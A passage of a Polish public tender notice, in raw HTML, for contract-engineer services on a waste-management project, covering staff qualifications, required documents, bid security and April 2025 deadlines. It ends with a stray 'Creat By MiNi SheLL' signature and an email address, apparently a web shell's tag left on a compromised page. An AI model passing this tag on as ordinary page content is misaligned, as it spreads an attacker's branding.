oraz zarządzania ryzykiem (jedna osoba), posiadający następujące kwalifikacje zawodowe i doświadczenie:<br/>- wymagane wykształcenie wyższe, posiadająca minimum 5 letnie doświadczenie zawodowe w zakresie finansów i rozliczeń, przy przynajmniej jednym zakończonym zadaniu inwestycyjnym (z zakresu gospodarki odpadami) o wartości robót budowlanych minimum 5.000.000,00 zł brutto, realizowanych w oparciu o warunki kontraktowe FIDIC lub równoważne, oraz wykonaniu minimum jednej analizy ryzyka kontraktu.<br/>3)	Projektant branży konstrukcyjno-budowlanej (jedna osoba), posiadający następujące kwalifikacje zawodowe i doświadczenie:<br/>- minimum 5-letnia praktyka zawodowa w projektowaniu,<br/>- uprawnienia do projektowania w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia w specjalności konstrukcyjno - budowlanej, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995 r., wystarczające do realizacji przedmiotu zamówienia,<br/>- należący do właściwej izby samorządu zawodowego,<br/>4)	Projektant branży sanitarnej - Specjalista ds. sanitarnych (jedna osoba), posiadający następujące kwalifikacje zawodowe, doświadczenie i uprawnienia:<br/>- minimum 5-letnia praktyka zawodowa w projektowaniu,<br/>- uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r., wystarczające do realizacji przedmiotu zamówienia,<br/>- należący do właściwej izby samorządu zawodowego.<br/>5)	Projektant branży elektrycznej i elektroenergetycznej (jedna osoba), posiadający następujące kwalifikacje zawodowe, doświadczenie i uprawnienia:<br/>- minimum 5-letnia praktyka zawodowa w projektowaniu;<br/>- uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r., wystarczające do realizacji przedmiotu zamówienia,<br/>- należący do właściwej izby samorządu zawodowego.<br/>6)	Projektant branży drogowej (jedna osoba), posiadający następujące kwalifikacje zawodowe i doświadczenie:<br/>- minimum 5-letnia praktyka zawodowa w projektowaniu,<br/>- uprawnienia do projektowania w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia w specjalności inżynieryjnej drogowej, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995 r., wystarczające do realizacji przedmiotu zamówienia,<br/>- należący do właściwej izby samorządu zawodowego,<br/>7)	Inspektor nadzoru w specjalności konstrukcyjno-budowlanej (jedna osoba), posiadający następujące kwalifikacje zawodowe i doświadczenie:<br/>- minimum 5-letnia praktyka zawodowa w pełnieniu funkcji Kierownika Budowy lub jako Inspektor Nadzoru,<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą Prawo budowlane do kierowania, nadzorowania i kontrolowania robót w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r.,<br/>- należący do właściwej izby samorządu zawodowego.<br/>8)	Inspektor Nadzoru w specjalności sanitarnej - Specjalista ds. sanitarnych (jedna osoba), posiadający następujące kwalifikacje zawodowe, doświadczenie i uprawnienia:<br/>- minimum 5-letnia praktyka zawodowa w pełnieniu funkcji Kierownika Budowy lub jako Inspektor Nadzoru,<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą Prawo budowlane do kierowania, nadzorowania i kontrolowania robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r.,<br/>- należący do właściwej izby samorządu zawodowego.<br/>9)	Inspektor Nadzoru w specjalności drogowej - (jedna osoba), posiadający następujące kwalifikacje zawodowe, doświadczenie i uprawnienia:<br/>- minimum 5-letnia praktyka zawodowa w pełnieniu funkcji Kierownika Budowy lub jako Inspektor Nadzoru,<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą Prawo budowlane do kierowania, nadzorowania i kontrolowania robót w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r.,<br/>10)	Specjalista ds. elektrycznych i AKPiA (jedna osoba), posiadający następujące kwalifikacje zawodowe, doświadczenie i uprawnienia:<br/>- minimum 5-letnia praktyka zawodowa w pełnieniu funkcji Kierownika Budowy, Robót lub jako Inspektor Nadzoru;<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą Prawo budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 01.01.1995r;<br/>- należąca do właściwej izby samorządu zawodowego.<br/>11)	Specjalista ds. Zamówień Publicznych (jedna osoba), posiadający następujące doświadczenie, <br/>- posiadający minimum 5 letnie doświadczenie zawodowe, przy prowadzeniu postępowań w trybie ustawy pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	informacja z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Prawo zamówień publicznych oraz art. 108 ust. pkt 4 ustawy Prawo zamówień publicznych dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego — sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>2. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (według wzoru określonego w załączniku nr 6 do SWZ),<br/>3.	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>4.	zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>5.	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, <br/>6.	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych (według wzoru określonego w załączniku nr 5 do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy Prawo zamówień publicznych,<br/>- art. 108 ust. pkt 4 ustawy Prawo zamówień publicznych, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy Prawo zamówień publicznych,<br/>- art. 109 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, <br/>o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170 z późn. zm.), <br/>- art. 109 ust. 1 pkt 5 i 7 ustawy Prawo zamówień publicznych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego, tj. co najmniej 500.000,00 zł. <br/>Wykonawca spełni warunek, jeżeli przedstawi kopię polisy odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjną minimum 500.000,00 złotych (pięćset tysięcy złotych 00/100 zł) wraz z potwierdzeniem zapłaty<br/>- wykaz usług zgodnie z pkt 5.2.4.1 SWZ (według wzoru określonego w załączniku nr 8 do SWZ) wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 6 lat (licząc wstecz od dnia upływu terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie — wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie;<br/>- wykaz osób zgodnie z pkt 5.2.4.2 SWZ, (według wzoru określonego w załączniku nr 9 do SWZ) które będą uczestniczyć w realizacji zamówienia, z podaniem ich kwalifikacji zawodowych, doświadczenia i wykształcenia z odpowiednim funkcjami jakie zostaną im powierzone. <br/>- wykaz inwestycji, w których uczestniczył Inżynier wiodący (według wzoru określonego w załączniku nr 10 do SWZ)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości 9.000,00 zł (słownie: dziewięć tysięcy złotych 00/100).<br/>2.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach, określonych w art. 97 ust. 7 ustawy Prawo zamówień publicznych tj.<br/>a)	pieniądzu,<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299).<br/>3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Prawo zamówień publicznych.<br/>4.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 14.04.2025 r. do godz. 10:00.<br/>5.	Za termin wniesienia wadium w formie pieniężnej przyjmuje się dzień i godzinę uznania rachunku bankowego Zamawiającego kwotą wadium. Zamawiający uzna wadium za wniesione w terminie tylko wówczas, gdy Zamawiającego potwierdzi, że środki z tytułu wadium zostały zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>6.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto: PeKaO S.A. I/ Oddział w Zamościu, nr konta 36 1240 2816 1111 0000 4015 1915, w treści przelewu należy wpisać: „wadium&#34;, do postępowania na „Pełnienie funkcji Inżyniera Kontraktu” (JRP/PSZOK/01/2025) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Zgodnie art. 58 ust. 2 ustawy Prawo zamówień publicznych Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 10.1.1. SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	W przypadku, gdy w postępowaniu zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <br/>5.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie<br/>6. Warunki udziału w postępowaniu, o których mowa w pkt 5 SWZ powinien spełnić co najmniej jeden z Wykonawców samodzielnie lub wszyscy Wykonawcy łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany zawartej umowy w przypadkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com